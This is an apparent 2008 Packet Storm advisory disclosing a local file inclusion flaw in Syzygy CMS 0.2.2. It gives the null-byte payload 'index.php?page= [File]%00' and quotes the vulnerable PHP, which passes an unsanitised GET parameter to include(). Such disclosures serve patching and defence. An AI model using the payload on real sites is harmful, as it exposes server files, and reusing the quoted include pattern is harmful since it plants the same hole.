syzygy-lfi.txt

2008-06-11T00:00:00
ID PACKETSTORM:67207
Type packetstorm
Reporter StAkeR
Modified 2008-06-11T00:00:00

Description

                                        
                                            `[*]================================================================================[*]  
| _____ _ _ _ _____ |  
| |_ _| |__ (_)_ __ __| | | ____| _ ___ |  
| | | | '_ \| | '__/ _` | | _|| | | |/ _ \ |  
| | | | | | | | | | (_| | | |__| |_| | __/ |   
| |_| |_| |_|_|_| \__,_| |_____\__, |\___| |  
| |___/ |  
| ____ _ _ |   
| / ___| ___ ___ _ _ _ __(_) |_ _ _ |  
| \___ \ / _ \/ __| | | | '__| | __| | | | |  
| ___) | __/ (__| |_| | | | | |_| |_| | |  
| |____/ \___|\___|\__,_|_| |_|\__|\__, | |  
| |___/ |  
[*]================================================================================[*]  
| Author: StAkeR ~ StAkeR@hotmail.it |  
[*]================================================================================[*]  
| Third Eye Security Members => Osirys,StAkeR,Over_Flow,Miclen |  
[*]================================================================================[*]   
| Syzygy CMS 0.2.2 <= Local File Inclusion Vulnerabilty |  
[*]================================================================================[*]  
| http://surfnet.dl.sourceforge.net/sourceforge/syzygycms/syzygycms-0.2.2.tar.gz |  
[*]================================================================================[*]  
| index.php?page= [File]%00 |  
[*]================================================================================[*]  
  
<?php  
if (isset($_GET['page']))  
{  
$page=$_GET['page'];  
}else{  
$page='main.php';  
}  
if(is_file($page))  
{  
//add block to page  
include("./".$page);  
}else{  
//error reading page! go to default error file 404error.php  
include("./404error.php");  
}  
?>  
  
  
  
  
`